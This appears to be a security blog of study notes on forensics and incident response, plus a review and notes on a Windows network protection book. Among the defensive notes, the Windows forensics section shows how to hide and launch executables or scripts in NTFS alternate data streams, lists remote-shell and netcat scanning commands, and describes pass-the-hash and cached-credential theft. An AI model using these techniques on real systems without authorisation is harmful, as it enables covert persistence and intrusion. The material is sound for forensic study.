IIS logs to c:\winnt\system32\logfiles\W3SVC by default. More info at http://www.iisfaq.com

After a successful bo attempt, there should be no logging as the server typically crashes

2 - Unix Live Response

Much of the process is the same for Windows Live Response, however differences are noted

Volatile Data

* Loaded kernel modules
* Mounted file systems

Review loaded kernel modules via the lsmod command. If the module is hidden, there is no way to detect it in the live response process

Nonvolatile Data

* Syslog logs
* User history files

On redhat, rpm -qa will list installed software and patches

On unix there is no create time as in windows, so the inode last changed "ctime" is all you have

Time can often be saved by comparing files to known good or bad hashsets (see NSRL)

/var/run/utmp contains users that are currently logged in(w command)

/var/log/wtmp contains the history of logins (last command)

zap2 is a common tool for hackers to clear these entries

datapipe is used to redirect ports on the local machine, allows for firewall bypass

/etc/syslog.conf contains settings for syslog logging

kill -31, this signal is undefined on Linux, often used by kernel level rootkits

Windows files cannot be deleted while still in use by a process in memory. However unix files can be deleted and stay resident only in memory until reboot. Binary images of processes can be found in /proc/ , also the /proc//fd directory contains all the open files for that process

3 - Collecting Network-Based Evidence

4 types of Network Based Evidence

* Full content data
* Session data
* Alert data
* Statistical data

Scanmap3d provides graphing for snortIDS

Hubs are half-duplex and create collisions as opposed to a Tap which is expensive, but full-duplex

Span ports will miss traffic on heavily loaded networks and some can only monitor a single vlan in a single direction

Flowgrep can search for regex accross tcp packet streams

FRHED free hex editor for windows

Argus for session logging

4 - Analyzing NBE for a Windows Intrusion

TCPslice can be used to split up pcaps into smaller sessions

High counts of "other" protocol can indicate either heavy use of a single unknown protocol or a vast amount of unrecognized protocols

Often low counts of various protocols are characteristic of port scans

Batch mode in snort will run snort against a pcap

Nitko is a common tool for web scanning

No tool currently exists to read and reconstruct SMS sessions

5 - Analyzing NBE for a Unix Intrusion

227 Entering Passive Mode (192,168,1,1,192,1) You must covert 192,1 into a real TCP port number

(192 * 256) + 1 = Port 49,153

6 - Before You Jump Right In ...

Forensic Air-Lite from Forensic Computers, Inc

Sample Toolkit: digital camera, multi-function screwdriver, flashlight, dremel, extra jumpers, extra screws, cable ties, internal pc power extension cords, extra IDE cables, scsi cables, scsi terminators, chain of custody forms, evidence labels, pens, evidence envelopes, evidence tape, anti-static bag, evidence hard drives, boot floppies/cdrom, blank cd/dvds/floppies, network hub/switch, network cable, forensic dongles, power strip, and OS install media.

Document the original hard drive: make, model, serial num, evidence tag num, geometry, capacity, and jumper settings

Document the original system: make, model, serial num, media evidence tags, expansion cards, peripheral connections, physical location

Agent notes worksheet should contain relevant info sucah as conference calls, shipment tracking numbers, relevant findings, etc

After duplication, you must label the evidence hard drive: Case num, Evidence tag num(s), contents, acquired by, and date

Chain of custody forms should contain: source individual, source location, destination individual, destination location, transfer date

When access is required to evidence safe, it must be recorded in the Evidence Access Log: date, name, case num, time in, and time out

7 - Commerical-Based Forensic Duplications

You typically must jumper the drives as Master for everything to operate correctly

Firewire allows the hard drives to be hot swappable

Ensure you use the Windows eject/disconnect function to prevent data corruption

By default EnCase will duplicate and create a series of 640MB files

Be sure to use the Evidence tag number as the device unique identifier in EnCase

Generally duplication will take longer with compression but the evidence files will be smaller

Not recommened to set a password for an evidence file

Hashing feature should always be enabled for duplication

8 - Noncommercial-Based Forensic Duplications

When booting to your forensic workstation, make sure the bios is configured to boot from OS hard drive and not the evidence hard drive.

conv=notrunc,noerror,sync - notrunc will stop truncation in the event of an error, noerror tells dd to continue when an error is encountered, and sync will replace bad blocks with zeros

After dd is complete, immediately make the file read-only and hash it

Images duplicated on Linux(ext3) will not be usable on FAT32 unless broken into 2G chunks using count & skip dd functions

DD rescue will traverse hard drives forwards and backwards and use variable blocks on bad hard drives

9 - Common Forensic Analysis Techniques

Recommended to first recover deleted files

Associate a dd image with a physical device with Enhanced_Loopback

# losetup /dev/loop0 .dd

fdisk -l /dev/loop0

Utilize NSRL to weed out known files

10 - Web Browsing Activity Reconstruction

Securityfocus Browser Forensics Part 1 , Part 2

IE has 3 types of evidence: browsing history, cookies, and Temp Internet Files(Cache)

Index.dat containsbrowsing history and links to cookies and cache

C:\Doc and Set\\Cookies - contains index.dat and all user's cookies

C:\Doc and Set\\L Set\History\ - contains cached sites by date

C:\Doc and Set\\Temporary Internet Files\ - contains all cached content

FTK's browser reconstruction is far superior to Encase

Cookies contain variable names and values, time of download, time of expiration, and status info

Galleta will parse cookies for you

In Index.dat at byte offset 0x50, a listing of cache directories is found

If an Index.dat file is large enough, it may contain more then one hash table

URL and LEAK both mean the suspect viewed the site

Index.dat uses MS FILETIME which is number of 100-nanoseconds since 00:00 1 Jan 1601

Most use UNIXTIME which is number of seconds since 00:00 1 Jan 1970

Unixtime = .0000001 * Filetime + 11,644,473,600, run result through unix cmd local-time

11 - E-Mail Reconstruction

Paraben's Network Email Examiner

Munpack will undecode MIME file attachments in email

12 - Microsoft Windows Registry Reconstruction

System registry files are saved to C:\WINDOWS\system32\config in default, software, and system

User registry files are found in ntuser.dat in the profile directory

Installed programs can be found in Microsoft\Windows\CurrentVersion\Uninstall or

Microsoft\Windows\CurrentVersion\App Paths

A registry search for MRU will give you a list of Most Recently Used docs/apps

Software\Microsoft\Internet Explorer\TypedURLs is a good one

13 - FTA - Using Linux for Analyzing Files of Unknown Origin

Using the -g option with gcc will include debugging information

strip command will remove all symbols from the compiled binary

Using the -static option with gcc will embed the needed libraries in the binary making it self contained

The -S option with gcc will make an assembly language file

By default strings will not scan the entire file, you must use the -a option

The -tx option with strings will add the offset

nm -a command will show you all the symbols in a binary

ldd command will list all the shared objects in a dynamic binary

Good idea to compare hashes of shared objects with known good ones to confirm any tampering

ELF format reference, also /usr/include/elf.h describes the ELF structure

readelf --file-header will list out the header information

readelf --section-headers will list out the section information

readelf --program-headers will list out locations of elf segments

readelf -symbols provides similar info to nm

readelf --debug-dump gets all the debugging information

readelf --hex-dump=

objdump -l -source will disassemble the binary into assembly(dead listing)

kill -l will list out all the signals

Strace executes a binary and intercepts all system calls and signals.

Ltrace intercepts all library calls

14 - FTA -A Hands-On Analysis of the Linux File aio

Without using the -v option in hexdump, duplicate lines are replaced with an asterisk

System call services are found in /usr/include/asm/unistd.h

Hexworkshop

/proc is a pseud-file system that is only populated by volatile data when the system is running.

the maps file in /proc/ will show you mapped memory

cat /proc/version to confirm that the compiler and OS versions match

15 - FTA - Analyzing Files of Unknown Origin(Windows)

Visual C++ Toolkit 2005

BinText provides a gui for strings output

PE and COFF Specifications

The cygwin pe_map command is similar to objdump

link -dump -all displays all the PE format info along with hex dump of the sections

IDA File -> Produce enables you to generate and export the dissasembly listing

Strace for Windows

PEiD

Unpacking Tools , unpacking may some times result in execution of code

ProcDump will allow you to edit the PE structure to fix any errors

16 - Building the Ultimate Response CD

Live response tools should not be dependent on files from the suspect system. Utilize filemon to determine dependecies and copy them to your response tools directory. Different versions of OSes will have different response toolkits. Also, trusted tools should be prepended with t_ to differentiate them.

17 - Making Your CD-ROM a Bootable Environment

18 - Forensic Duplication and Analysis of PDAs

For your workstation to recognize a PALM pda you will need the drivers along with HotSync

For Encase to communicate with a Palm, Hotsync must be exited

Acquistion should be done with a fresh set of batteries or in a cradle to avoid data loss

The device should be in console mode(Shortcut-Dot-Dot-Two) and configured to stay on in the cradle

Paraben's PDA Seizure installs a file(CESeizure.dll) on the device in unallocated space

19 - Forensic Duplication of USB and Compact Flash Memory Devices

mount -r /dev/sda /mnt/usb in read only mode

20 - Forensic Analysis of USB and Compact Flash Memory Devices

USB drives usually only have one large FAT partition, sometimes with no partition table

Fatback simulates cmd prompt for your image

21 - Tracing Email

Anytime an email's header field starts with X, it is an optional field used by any email server

Always read headers from the bottom up, to find the source

Anonymous Remailers

22 - Domain Name Ownership

Another nail in the coffin for MD5

2007-12-03T21:49:00.001-05:00

While collisions in MD5 hashes are nothing new, this most recent study by Wegner, Stevens, Lenstra (Article Link ) adds even more concern to the trustworthiness of an MD5 hash. If you can't trust a signed executable, what can you trust? I think nothing. Their technique however requires much premeditation. Its not as if you can create a collision on an existing executable. To be effective in a malicious way, it would require that you create two executables up front with the same hash. This is done by appending 832 bytes of useless data to the existing executables. As you can imagine, this would make it very easy for a criminal to create two versions of software, one with a backdoor, that have the exact same MD5 hash. Of course, it would be easy for them to get the good one signed and then create a download site with the malicious one. While this is somewhat sophisticated, i could definitely see this being utilized by the hack for money crews. It doesn't take much to get your software posted on some shareware download site. Also, I could see elite crews even trying to get drivers signed in this method. So what are we supposed to do about it? The authors of the paper suggest that SHA-1 is much more resistant to collisions and is a better alternative. Despite that, I think a search for a better hashing and signing algorithm get underway if it already hasn't. I don't think the threat is imminent by any means, but we will need something stronger in place within the next 2-3 years.

Windows Forensics and Incident Recovery

2007-10-25T22:09:00.000-04:00

Windows Forensics and Incident Recovery

Notes

Windows Event Log

-clearing the Security Event Log generates event ID 517

-Stealing info via USB drive may cause event ID 134: "Removable Storage Service"; If logs have been cleared,check HKEY_LOCAL_MACHINE\System\MountedDevices Registry key. A right click on these entries may show "RemoveableMedia"

-Logon events http://support.microsoft.com/default.aspx?kbid=174073

-Logon types http://support.microsoft.com/default.aspx?scid=kb;en-us;140714

-More security Events http://support.microsoft.com/kb/174074/

CMD Line History

- doskey /history or the RunMRU registry key

File Associations

- C:\>assoc will list out every association; C:\>assoc .exe ---> .exe=exefile

- ftype exefile ---> exefile="%1" %* ; shows what variables used at runtime; matched the value in HKEY_CLASSES_ROOT\exefile\shell\open\command

- if this value has been moded by malware use --> C:\>ftype exefile="%1" %* to change back

Hidden Files

- To view hidden files ---> C:\> dir /ah; using the attrib command will list out all file attributes

Scheduled commands

- Sometimes malicious code is scheduled; use at cmd or schtasks.exe to view scheduled tasks

File Signatures

- located in the first 20 bytes of a file; MZ is found in executables; look 4 mismatch of signature and extension

- a good list of file headers http://www.techpathways.com/uploads/headersig.txt

File Times(MAC Times, Modified Accessed Created)

- C:\>dir /ta ----> lists in order last accessed

- The Unix touch cmd has been ported to windows http://www.dwam.net/docs/aintx/

- if auditing is enabled, changes to MAC times create events with ID 560 in the eventlog

FileBinding-

- Elitewrap will combine 2 files and compress http://homepage.ntlworld.com/chawmp/elitewrap/

- GUI version inPEct http://sysdlabs.hypermart.net/proj/inpect.txt

ADS(Alternate Data Stream)

- Lads will detect this http://www.heysoft.de/Frames/f_sw_la_de.htm

- Also Streams from sysinternals http://www.sysinternals.com/utilities/streams.html

- the best way to remove an ADS is to copy the file, delete the old, and rename

- ADS can also be created as directories ---> echo "FooBar" > :ads.txt

- This adds an executable to a common txt file -> C:\ads>type c:\windows\system32\notepad.exe > myfile.txt:np.exe

- Call it like this -> C:\ads>start .\myfile.txt:np.exe , the full path works also

- vb scripting can be hidden in ads and launched --> C:\ads>wscript //E:vbs myfile.txt:ads.txt

Registry Hiding

- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TimeZoneInformation is a common hiding place because it is not used by the OS. Strings or small programs can be hidden in this key http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sysinfo/base/gettimezoneinformation.asp

Document Metadata

- Strings from sysinternals will also find metadata http://www.sysinternals.com/utilities/strings.html

- rhdtool from MS will remove metadata http://www.microsoft.com/downloads/details.aspx?FamilyID=144e54ed-d43e-42ca-bc7b-5446d34e5360&displaylang=en

OLE Storage

-Merge Streams will combine files http://www.ntkernel.com/w&p.php?id=23

Steganography

- Free Tools at http://home.earthlink.net/~emilbrandt/stego/software.html (S-Tools4)

- Hydan is also popular http://www.crazyboy.com/hydan/

Windows Server Port List

- http://support.microsoft.com/default.aspx?scid=kb;en-us;832017

NTFS Conversion

- to convert from FAT to NTFS --> C:\>convert /FS:NTFS c:\

NSA Templates

- you can download OS templates for windows secedit(Local Security Policy) http://www.nsa.gov/snac/downloads_os.cfm?MenuID=scg10.3.1.1

GPO settings

- gpresult.exe can be run to find policy settings http://www.microsoft.com/windows2000/techinfo/reskit/tools/existing/gpresult-o.asp

Login Restrictions

- you can modify lockout settings using the net accounts cmd to allow for unlimited paswd attemps

http://support.microsoft.com/default.aspx?scid=kb%3ben-us%3b194739

IIS Application mappings

- using the MMC, bring up application mappings and disable all uneccessary mappings

- IIS Lockdown and URLscan can provide additional security for ISS servers

Windows File Protection

- backup copies of protected files are restored from cache if modified or deleted %SYSTEMROOT%\system32\dllcache

- the cmd line utility sfc can be used to replace modified files

Perl lib Win32::AdvNofity

- allows you to creat your own WFP, for example a static website, which will monitor for defacements and automatically replace the file and notify you. http://idnopheq.perlmonk.org/perl/packages/x86/Win32/

Patch Management

- Download MBSA here http://www.microsoft.com/technet/security/tools/mbsa2/default.mspx

- Shavlik Trial http://www.shavlik.com/pDownloadForm4.aspx?productid=1

Web Vulnerability Assessment

- Free tools available at http://www.ntobjectives.com/freeware/index.php

Centralized Logging

- ntsyslog, kiwi syslog daemon, dumpevt.exe(somarsoft)

- port reporter provides mapping logs http://support.microsoft.com/?id=837243

Volatile Information Recovery

- C:\>date /t && time /t , recovers system date and time for comparision

- systeminfo.exe , native on XP or newer will show uptime also, psinfo.exe from sysinternals

- psloggedon.exe from sysinternals shows remote and local logged on users

- netusers.exe from somarsoft will also show previously logged on users with the /h switch

- C:\>net session will displya any active remote connections

- C:\>net use * \\\c$ /u:Administrator , to remote log on

- to list process out pulist from resource kit, or pslist from sysinternals, using the /t switch with pslist will display processes in a tree. Trojaned processes often will fall outside the tree

- listdlls.exe from sysinternals will give you version information along with the command used to start the process

- handle.exe from sysinternals lists out everything the process is accessing

- c:\>tasklist /svc native to XP lists out processes along with window title information

- tlist from the windows debug kit is very functional http://www.microsoft.com/whdc/ddk/debugging/default.mspx

- svchost is a windows generic process that shows up multiple times. To find out what they are mapped to review the following reg key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost

Remote Shell

- Net use \\machine\ipc$ /user:machine\administrator

- psexec \\machine cmd

Process Info Guidelines, at minimum collect the following:

-Process identifiers (PIDs) for each process running on the system (provided by most all tools)

-Process name (provided by most all tools)

-Length of time the process has been running (pslist.exe)

-Command line used to launch each process (listdlls.exe, cmdline.exe, tlist.exe)

-Full path to the executable file that each process was launched from (cmdline.exe, tlist.exe)

-User context that each process runs under (handle.exe, pulist.exe)

-Services running under each process (tlist.exe, tasklist.exe)

Additionally, the investigator will also want to collect the following:

-Handles used by each process (handle.exe)

-Modules (DLLs) used by each process (listdlls.exe)

Process Memory

- using pmdump.exe from http://www.ntsecurity.nu/toolbox/pmdump/ you can extract whats in memory for a given PID

- dd from http://users.erols.com/gmgarner/forensics/ will slice out entire physical memory contents

- c:\>dd if=\\.\physicalmemory of=c:\win2k-physmem.dd bs=4096

Network Stat & Connections

- promiscdetect from http://www.ntsecurity.nu/toolbox/promiscdetect/ will find interfaces in promiscuous mode, locally

- netstat lists may 0.0.0.0 connections which results from apps binding to the INADDR_ANY constant

- on XP or newer, netstat -ano, the -o option lists the PID

- nbtstat -s, lists current netbios over tcpip sessions

- fport from http://www.foundstone.com/resources/freetools.htm will map ports with the full path of process

- net use lists out all shares currently mapped

- net share lists out all resource shared out on the system

- net session lists active SMB sessions made to the system over the network

- net file lists out any files in use by an active net session

Clipboard info

-pclip.exe from http://unxutils.sourceforge.net/ will dump clipboard info to STDOUT

Command History

- C:\> doskey /history will show command line history

Service & Drivers

- net start will list all services running but not device drivers

- sc.exe from resource kit and native on XP or newer

- drivers.exe from resource kit and driverquery on XP or newer provide alot of driver related info

GPO settings

- can be used to determine how a system was compromised is settings were changed

- GPList from http://www.ntsecurity.nu/toolbox/gplist/ shows GPO's applied on a system

- GPResult.exe from Resouce kit shows settings of current user only

Protected Storage

- pstoreview.exe from http://www.ntsecurity.nu/toolbox/pstoreview/ can reveal user info in PS

MAC Information

- dir with /tw , /ta. /tc will give specific mac time information

- macmatch found here http://www.ntsecurity.nu/toolbox/macmatch/ will search a given time period

File permissions

- cacls, native to windows, will show permissions of any given file

File integrity

- md5deep from http://md5deep.sourceforge.net/ will calculate md5 hashes for you

Recycle Bin Analysis

- Rifiuti from http://www.foundstone.com/resources/forensics.htm will parse the INFO2 file

Registry Analysis

- reg.exe from resource kit will pull out any keys from the registry that your looking for form the cmd line

- HKEY_LOCAL_MACHINE or CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run is most popular for malware

- keytime.pl from the book will show last write times for any given registry key

User Accounts

- most often compromised machines contain a new account(s) created by the hacker that needs to be anaylyzed

- last logon, time created, # of logins, and permissions will all be useful information

Event Logs

- Auditpol.exe from RK can be used to verify the level of logging set on the system

- dumpel.exe from http://www.microsoft.com/windows2000/techinfo/reskit/tools/existing/dumpel-o.asp will grab all el data

- D:\>psloglist –s –x system , from http://www.sysinternals.com/Utilities/PsLogList.html can be used remotely

File Analysis

- strings from http://www.sysinternals.com/Utilities/Strings.html will retreive ascii/unicode from hex

- bintext from http://www.foundstone.com/resources/proddesc/bintext.htm is a gui w/ a good filter

- ms has a dll lookup online http://support.microsoft.com/dllhelp/

- dependencywalker from http://www.dependencywalker.com/ has a gui to show all file dependencies

- WordLeaker will rip out word metadata, along with revision history, available at http://www.elligre.tk/madelman/madelman/index.php/archivos/2005/02/23/wordleaker-extracting-info-from-word-files/

- fdte from http://www.digital-detective.co.uk/freetools/fdte.asp will grab hidden dates & times from a binary

- you can view pdf metadata by using Adobe Reader, FILE | Document Properties

CA Identity Theft Law(SB 1386) - affects all companies doing business in CA

- http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html

Know What To Look For

- The goal of any incident investigation should be to determine whether an incident occurred, and if so, how was it able to occur(RCA)

Infection Vectors

- common vectors: email, p2p, IM, web browser, OS/application buffer overflows, default/weak passwords

Malware Footprints

- often leave new files and directories

- added to startup C:\Documents and Settings\\Start Menu\Programs\Startup

- added to run in registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run

- afind(foundstone) or macmatch(ntsecurity) can be used to find recently modified/created files/dirs

- can be a scheduled task(at cmd) and creates a job in C:\WINNT\Tasks

- example (2K) c:\>at 11:00pm /every:5,10 cmd /c "sol.exe"

- example (XP) c:\> schtasks /create /tn Solitaire2 /tr sol.exe /sc onlogon

- often malware changes how the system handles .exe files, HKEY_CLASS_ROOT\exefile\shell\open\command

- original value "%1"%*, other extension modified are .bat, .com, or .txt

- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon can also be modified too

- Shell should be set to "Explorer.exe"

- abnormal processes, inparticular svchost.exe is often mimicked(scvhost or svchosts) or duplicated

- malware can often be set up as a windows service, using srvany.exe (resource kit)

http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/q137/8/90.asp&NoWebContent=1&NoWebContent=1

- example C:\>path\instsrv.exe path\srvany.exe, by editing the following registry entry

- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\service name, you can run any app or executable

Rootkits

- popular Windows RK site is Greg Hoglund's site http://www.rootkit.com

- user-mode rootkit simply replaces files with trojaned verions or uses DLL injection to overwrite while in memory

- kernel-mode rootkit overides the TCB and hooks into all system calls

- a good way to remove is to boot into Safe Mode and remove entries in Run key and actual files themselves
Forensics Server Projet(POC for automated system info collection)

- http://www.windows-ir.com/fsp.html, runs on windows/linux, requires perl(requires Win32::GUI, Digest::MD5, and Digest::SHA1, use c:\>perl>ppm install ), can run on any port(default 7070)

- setup of the First Repsonders Utility(FRU) requires Win32::GUI, Win32::Lanman, Win32::Perms, Win32::API::Prototype, Win32::TaskScheduler, Win32::DriveInfo, Win32::IPConfig. Requires a CD Burner and you must also download the following 3rd party utilites: cmd.exe(clean), (sysInternals psloggedon, pslist, psloglist, psinfo, listdlls, handle), tlist from MS Debugging Tools, (DiamondCS cmdline, iplist, openports), (FoundStone rifiuti), (NTSecurity.nu promiscdetect) and reg and auditpol from MS.

- FRU also requires the following perl scripts getos.pl, pclip.pl, e_cmd.pl, service.pl, getsys.pl, tasks.pl, regdump.pl, mdmchk.pl, shares.pl, dt.pl, and ip.pl

- the clean cmd.exe should be placed in the root directory of the CD-rom

- The File Client Component(fcli.pl) should be installed as apart of the FSP, it allows suspect files to be copied off
Scanners

- netcat can be used as a port scanner; D:\tools>nc -v -w 2 -z 10.1.1.15 ; will display open ports on given range.

- Adding an echo and dropping the z will grab bannners; D:\tools>echo QUIT | nc -v -w 2 10.1.1.15 0-1024 ;

- portqry is microsoft's version; http://support.microsoft.com/?kbid=310099

Sniffers

- netmon is built in by microsoft; http://support.microsoft.com/kb/148942/EN-US/ ; can also be run remotely via SMS
- windump is another w32 tcpdump; http://www.winpcap.org/windump/docs/manual.htm

Book Review: PYWN

2007-09-21T21:46:00.001-04:00

I had the pleasure of reading Protect Your Windows Network From Perimeter To Data by Jesper Johansson and Steve Riley. Even though it lacks Vista coverage being written in 2005, it is still very relevant and useful to security professionals today. It's a book that I wish I had read sooner, as its a very good primer to security in a windows environment. Its the perfect companion to the Windows Security Resource Kit. The book's two authors are both seasoned security veterans and their IT geek humor is enjoyed throughout the book. I found myself thinking, "Yeah, I've been there before" several times and laughing at the absurdity of the situations we are frequently presented with.

Two notes of caution about this book before delving in. These guys were both Microsoft employees at the time of the writing, so yes you will see some mild MS bias throughout, but they do a good job of reminding you in the text as well. I mean really, who recommends ISA server over a FW appliance like Netscreen, Checkpoint, or ASA, other then a MS employee or a Redmond Kool-aid drinker. Also, while this book contains great nuggets of information, for someone thats been in the security industry awhile, there will be a lot of general IT security information that you can just skim through in the first few chapters. This does not take away from the book in any way, just broadens the target audience some.

One of things I enjoyed most about this book was its readability. You can easily read a chapter a night and finish it quickly, because its interesting and not dry like many books(i.e. Official ISC2 Cissp Guide). Also, the authors revel in giving their brutally honest opinion, even when not always right, but it makes for very good reading. One of the early points they make, which should be known to the masses, is that complete security is unattainable. They used the illustration of chasing unicorns. While only possible in theory, you can only hope to reduce your attack surface and keep your risk at acceptable levels, because security is a dynamic state, not something that can be statically reproduced in reports and stamped with a seal of approval. Anybody that says their network is "secure" doesn't understand that security isn't really a state, but an ongoing process of managing risk. The book also provides, excellent coverage of Windows patching schemes, developing security policies, and educating your users on what not to do. One of the stand out chapters for me, was the security dependency one, which illuminates something that most people don't really address. Services accounts and dependencies on other systems present a very big danger to networks. You in essence reduce your security to that of the least secure system when you allow your critical assets to be dependent on a workstation that has the same service account. Also, often times domain admins will use their account to login to low security systems, thus exposing their credentials. Another great chapter, which I never would have thought reading the title, was the chapter on passwords. It has the most concise and easy to understand discussion of windows authentication schemes that I've ever read. In just a few pages, it discusses the differences between LM, NTLM, NTLMv2, and Kerberos and what configurations are available. The book also includes the requisite hardening guidelines for servers and clients and a very nice chapter on how to evaluate application security in an accurate and reproducible way. The book also comes with CD, the most notable tool being their passgen script.

The only negatives I really noticed in the book, was that they tried to justify not putting outbound filtering on the windows firewall, only to see that feature show up on the Vista version. Also, their discussion of Arp failed to mention hard coding your gateway with a static arp entry, which I thought was odd. Overall though, I would have to say I was mightily impressed with this book and would recommend it to anybody running a windows environment. If interested, you can peruse my notes here

Protect Your Windows Network

2007-08-30T22:08:00.000-04:00

Protect Your Windows Network From Perimeter to Data

by Jesper M. Johansson and Steve Riley

1 - Introduction to Network Protection

Information technology is working properly only when users can stop thinking about how or why it works

Security Management is about spending good money to have nothing happen

Fundamental Tradeoffs are between Cost, Level of Security, and Usefullness/Usability

Microsoft Library - Security Center

A protected network is one with an absence of unmitigated vulnerabilities that can be used to compromise the network

To have a truly secure network you must enumerate every place where it might be insecure and demonstrate that it is not insecure in any of them. This is only possible in theory not in practice (i.e. Chasing Unicorns)

2 - Anatomy of a Hack

No network is any more secure than the least-secure device connected to it

SQL injection is a vulnerability in the application, not the DBMS itself

The only proper way to clean a compromised system is to nuke and pave it

3 - Patch Your Systems

If required by support contract, ensure your 3rd Party Vendor(ISV) certifies the patch prior to rollout

Having a test bed that mirrors production is essential for patch testing, typcially VMware is utilized

Its also a good idea to use a small group of cross-functional users from withing your organization to beta test the patches prior to full rollout

Use MBSA as a free alternative for patch scanning

For small businesses WSUS is recommended, where as SMS is utilized in larger organizations

Hot patching replaces the code in memory, but not on the system files until after a reboot or service restart

You can minimize reboots by unpacking the update(use /x switch) and determining which files will be installed. Then determine which running processes have the same files opened. Often times this requires you to disable a service, stop the service, and then install the update.

Slipstreaming is critical to get patches rolled into your new installs. Requires ISOBuster . Read More

4 - Devloping Security Policy

Policies may include: Acceptable Use, Antivirus, Remote Access, Email & Retention, Data Protection, Password, Physical Security, Server Security, Direct Tap, Perimeter Protection, System Sensitivity Classification, and Privacy Policies

Sans Security Policy Center

Relevant Legislation/Stds: HIPAA , GLBA , SOX , ISO17799 , Financial Institutions

DISA Checklists , STIGs

The Site Security Handbook

5 - Educating Those Pesky Users

Social Engineering is the art and science of getting people to comply with your wishes

Diffusion of Responsibility - "Hey the VP says you won't bear any responsibility"

Chance for Ingratiation - "Look at the Reward you will get out of this"

Trust Relationships - "He sounds honest, I think I can trust him"

Moral Duty - "You've got to help me! Doesn't this make you so mad?"

Guilt - "What? You don't want to help me?"

Identification - "You and I are really two of a kind, huh?"

Desire to be helpful - "Would you help me here, please?"

Cooperation - "Let's work together. We can do so much"

If Two people know about it, It ain't a secret!

Security Awareness Training

A good policy for the helpdesk to follow is to use a bogus question or callback mechanism

6 - If you do not have physical security, you do not have security

Windows PKI Guides

Windows EFS Guide ,EFS should be used on all laptops

Adding USB Security

Setting name

Location

Default value

Possible values

WriteProtect

HKEY_LOCAL_MACHINE\System\
CurrentControlSet\Control \StorageDevicePolicies

DWORD=0

0 - Disabled

1 - Enabled

Key-In-Registery SYSKEY can be cracked, use Password Mode SYSKEY instead

7 - Protecting Your Perimeter

Quick Tips:

Block all inbound traffic where the source address is in your internal network

Block all outbound traffic where the source address isn't in your internal network

Block all inbound and outbound traffic with an RFC1918 source or destination

Block all source routed traffic

Block all fragments (except where IKE VPNs apply)

Deperimeterization

8 - Security Dependencies

Fundamental Rules for Network Segmentation

Less-sensiitive(low security) systems may depend on more-sensitive(high security) systems

More-sensitive(high security) systems MUST NEVER depend on less-sensitive(low security) systems

Service Account dependencies such as Backup Software accounts must be mitigated via reduced permissions and stronger passwords

Domain Admin accounts should only be used on a domain controller. Logging into a desktop system, which is less sensitive, via a domain admin account puts those accounts at risk.

To prevent SMB reflection attack on older systems ensure SMB Message Signing is enabled on the client and server

9 - Network Threat Modeling

Spoofing

Tampering

Repudiation

Information Disclosure

Denial of Service

Elevation of privelege

10 - Preventing Rogue Access Inside the Network

802.1X requires clients(supplicant) and switches/APs(authenticators) that support 802.1X, as well as an authentication server(Radius). Windows supports either EAP-TLS, which involves mutual trust of digital certificates, and PEAP, which allows for the supplicant to authenticate via traditional accounts(MS-CHAPv2).

Legacy devices that don't support 802.1X should be placed on a separate segment. Also, note that 802.1X will prevent PXE boot from working on the network. While several GPO's existe for managing wireless 802.1X networks, no published API's exist for wired 802.1X networks, making a large deployment very difficult. Another major flaw in 802.1X, is that once a client authenticates the port is opened and never reauthenticated, making it possible for an attacker to join a network. This only requires that the attacker spoof the MAC and IP address, however communication must be stateless(ICPMP,UDP).

Given the major decrease in the time it takes to crack wireless keys, recommended key lifetimes are now 8 mins(B) and 90 secs(A,G)

ipseccmd.exe can be used to define static and dynamic block rules on windows hosts. Note the policyagent service must be restarted in order for the rule to take effect. Only one policy can be assigned at a time. Read More

Domain Isolation

11 - Passwords and Other Authentication Methods

Cached Credentials for the local storage of domain logon info are a concatentation of your NT Hashed password salted with the username and domain, which is then hashed via MD4.They are stored in the Security Hive of the OS not in LSA Secrets.

Kerberos authentication is used between systems in a W2K or higher domain, except when connecting via IP instead of hostname. In that instance, it falls back to NTLM or NTLMv2, because Kerberos doesn't natively support reverse DNS.

Passing-The-Hash, alleviates the need for cracking the password. Both NTLM and LM are susceptible to this, where a a MITM can intercept the hash and resend it himself without even knowing the password. This only works for local accounts and on the system they came from. To be used on a remote host, the hash must be cracked.

Removing LM Hashes makes cracking the password take 4X longer

With Admin permissions CAIN|Credential Manager will extract and crack cached credentials immediately. Its best practice to disable the storing of cached credentials on all non-laptops.

12 - Server and Client Hardening

Microsoft Security Guidance

User Software Restriction Policies(SRPs) - Restrict by IE Security zone, full or relative path, by signing certificate, or by a hash.

Disable anonymous SID/Name translation

Disable anonymous enumeration of SAM accounts and Shares

Disable Everyone permissions for anonymous users(Default)

Disable Anonymous access to Named Pipes and Shares(Null session access)

Disable autoadminlogon

Enable SMB Message signing, requires that both clients have signing enabled

Recommended to use Send NTLMv2 response only\refuse LM

Create the SynAttackProtect key. Set 0 for systems on slow links. 2 for internet facing servers.

Restricted groups allow you to control who is a member of local groups(Powerusers,BackupOperators,etc) via GPO. This policy must be refreshed frequently to be effective.

Do not audit the use of Backup and Restore privilege, creates to many logs.

scwcmd transform, will convert an SCW role into a GPO

13 - Protecting User Applications

To get a full list of installed software check this key, it shows more then what you see in add/remove software

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Make every effort to use LUA priveleges

Make use of RSoP in the MMC snap-in to determine what net policy effect is on your machine. GPO should be used to secure many applications, most importantly IE and Outlook

Utilize the Attachment Manager to limit what types of files can be downloaded. Unsafe List

All applications must be reviewed for patch levels.

14 - Protecting Services and Server Applications

Uninstall unnecessary components, disable unnecessary features

To secure a service account, remove it from default groups, use a strong password, remove terminal services capability, and use GPO to deny log on locally and deny access to this computer from network for that account. Then use filemon/regmon to see what permissions are required for the account to function.

You can use sp_dropextendedproc in SQL server to remove unused stored procefures. Read More

More SQL Server Security Presentation and Checklist

IIS Lockdown only for IIS 5.0, IIS Whitepaper, and URLScan

15 - Security for Small Businesses

Windows Defender for Spyware, integrated into Vista

Vista UAC Documentation

Exchange Best Practices Analyzer

MS Small Business Security Guidance and More SB Resources

16 - Evaluating Application Security

